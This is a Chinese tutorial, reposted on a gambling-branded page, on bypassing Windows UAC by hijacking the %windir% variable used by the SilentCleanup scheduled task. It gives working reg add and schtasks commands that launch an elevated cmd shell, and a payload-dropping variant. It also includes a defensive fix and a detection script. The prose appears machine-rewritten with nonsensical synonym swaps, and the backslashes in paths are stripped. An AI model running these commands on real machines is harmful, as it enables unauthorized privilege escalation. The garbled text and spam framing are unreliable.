怎样运用SilentCleanup绕过UAC? | 申博官网
登录
  • 欢迎进入申博官网!
  • 如果您觉得申博官网对你有帮助,那么赶紧使用Ctrl+D 收藏申博官网并分享出去吧
  • 这里是申博官方网!
  • 申博官网是菲律宾sunbet官网品牌平台!
  • 申博开户专业品牌平台!

怎样运用SilentCleanup绕过UAC?

0x00 媒介

近来我在James Forshaw‏的博客学到了一个Win10下绕过UAC的技能,该要领经由历程剧本完成,而且现在微软还未对该绕过要领停止修复(估计在Win10 RS3修复)。经由我的进修测试,该要领异样适用于Win8,而且文中引见的绕过思绪很值得进修,因而整顿成文,分享给人人。

文章地点以下:

https://tyranidslair.blogspot.co.uk/2017/05/exploiting-environment-variables-in.html

0x01 简介

本文将要引见以下内容:

绕过思绪

应用要领

0x02 绕过思绪

在之前文章也分享过一些绕过UAC思绪的心得,可参考以下文章:

https://3gstudent.github.io/3gstudent.github.io/Study-Notes-of-using-sdclt.exe-to-bypass-UAC/

https://3gstudent.github.io/3gstudent.github.io/Study-Notes-Weekly-No.1(Monitor-WMI_ExportsToC++_Use-DiskCleanup-bypass-UAC)/

个人认为寻觅绕过UAC的要领可分为以下两个步调:

1、寻觅权限掌握不严厉的顺序

一般具有以下特性:

以普通用户权限启动顺序

顺序默许以高权限启动,一般标记为Highest

2、该顺序启动历程是不是可被挟制

启动途径是不是可被挟制

启动历程加载的题目(如dll)是不是可被挟制

0x03 应用要领

对应到James Forshaw‏的要领,也是优先寻觅权限掌握不严厉的顺序——计划任务中的SilentCleanup

注:

Matt Nelson之前也引见过一个应用SilentCleanup绕过UAC的要领,现在已被修复,文章地点以下:

Bypassing UAC on Windows 10 using Disk Cleanup

计划任务中的SilentCleanup:

普通用户权限便可启动

启动后主动提升为高权限

经由历程Powershell能够猎取更多细节,代码以下:

$task = Get-ScheduledTask SilentCleanup
$task.Principal

注:

Win7默许powershell版本2.0,不支持Get-ScheduledTask操纵

以下图

怎样运用SilentCleanup绕过UAC? 怎样运用SilentCleanup绕过UAC?

Authenticated Users透露表现普通用户权限便可启动

RunLevel为Highest透露表现以高权限启动

检察启动参数,powershell代码以下:

$task.Actions[0]

以下图

怎样运用SilentCleanup绕过UAC? 怎样运用SilentCleanup绕过UAC?

启动参数为%windir%system32cleanmgr.exe

这里存在一个可供应用的中央——情况变量%windir%

注:

———————————————-

申博|网络安全巴士站【www.bus123.net】

申博|网络安全巴士站是一个专注于网络安全、系统安全、互联网安全、信息安全,全新视界的互联网安全新媒体。。

———————————————-

可经由历程set windir检察情况变量%windir%

%windir%默许指向c:Windows

若是修正以后体系情况变量,指向其他途径,那末这里就完成了一个挟制

比方:

将%windir%设置为c:test

在c:testsystem32下将payload.exe保存为cleanmgr.exe

那末在启动计划任务SilentCleanup时,就会以高权限启动payload.exe,完成了UAC绕过

更间接的应用要领:

将%windir%设置为cmd /K,那末在启动计划任务SilentCleanup时会弹出cmd.exe

注:

cmd前面须要加参数,不然因为参数题目致使没法一般启动

/k透露表现弹出的cmd.exe在实行代码后不加入

为了增添隐蔽性(许多顺序在启动时须要挪用情况变量%windir%),在实行cmd的须要同时删除新增加的注册表键值windir,能够运用以下代码:

reg add hkcuEnvironment /v windir /d "cmd /K reg delete hkcuEnvironment /v windir /f && REM "
schtasks /Run /TN MicrosoftWindowsDiskCleanupSilentCleanup /I

注:

以上代码来自于https://gist.github.com/tyranid/729b334bf9dc0f38184dbd47ae3f52d0#file-disk_cleanup_uac_bypass-bat

将情况变量设置为cmd /K reg delete hkcuEnvironment /v windir /f && REM,那末在启动计划任务SilentCleanup时会弹出cmd.exe,接着实行删除注册表键值的敕令:reg delete hkcuEnvironment /v windir /f

完全操纵以下图

怎样运用SilentCleanup绕过UAC? 怎样运用SilentCleanup绕过UAC?

注:

参数若是换成/a,那末cmd.exe在实行前面的敕令后会马上加入

0x04 进攻检测

1、进攻

修正计划任务SilentCleanup的启动参数,将情况变量去掉,换成c:Windows,锁定途径

***权限:

$action = New-ScheduledTaskAction -Execute $env:windirSystem32cleanmgr.exe -Argument "/autoclean /d $env:systemdrive"
Set-ScheduledTask SilentCleanup -TaskPath MicrosoftWindowsDiskCleanup -Action $action

注:

以上代码来自于https://gist.github.com/tyranid/9ef39228ba0acc6aa4039d2218006546#file-fix_diskclean_uac_bypass-ps1

以下图

怎样运用SilentCleanup绕过UAC? 怎样运用SilentCleanup绕过UAC?

计划任务SilentCleanup的启动参数被修正为c:windowssystem32cleanmgr.exe,没法经由历程修正情况变量%windir%对其挟制

2、检测

经由历程powershell寻觅计划任务中是不是还存在可供应用的效劳,代码以下:

$tasks = Get-ScheduledTask | 
   Where-Object { $_.Principal.RunLevel -ne "Limited" -and
                  $_.Principal.LogonType -ne "ServiceAccount" -and
                  $_.State -ne "Disabled" -and
                  $_.Actions[0].CimClass.CimClassName -eq "MSFT_TaskExecAction" }

注:

以上代码来自于https://gist.github.com/tyranid/92e1c7074a9a7b0d5d021e9218e34fe7#file-get_scheduled_tasks-ps1

以下图,可供应用的效劳一共有四个,经测试,其他三个没法现实应用,只要SilentCleanup有用

怎样运用SilentCleanup绕过UAC? 怎样运用SilentCleanup绕过UAC?

0x05 增补

该要领异样适用于Win8情况,完全操纵以下图

怎样运用SilentCleanup绕过UAC? 怎样运用SilentCleanup绕过UAC?

Win7体系不包罗计划任务SilentCleanup,因而没法应用

0x06 小结

本文引见了经由历程计划任务SilentCleanup绕过UAC的要领,该要领仅须要经由历程剧本向以后用户注册表写入键值便可,简朴有用。

本文为 3gstudent 原创稿件,受权嘶吼独家宣布,未经许可制止转载,如若转载,请联络嘶吼编纂: http://www.4hou.com/technology/4834.html———————————————-

申博|网络安全巴士站【www.bus123.net】

申博|网络安全巴士站是一个专注于网络安全、系统安全、互联网安全、信息安全,全新视界的互联网安全新媒体。。


申博|网络安全巴士站声明:该文看法仅代表作者自己,与本平台无关。版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明怎样运用SilentCleanup绕过UAC?
喜欢 (0)
[]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址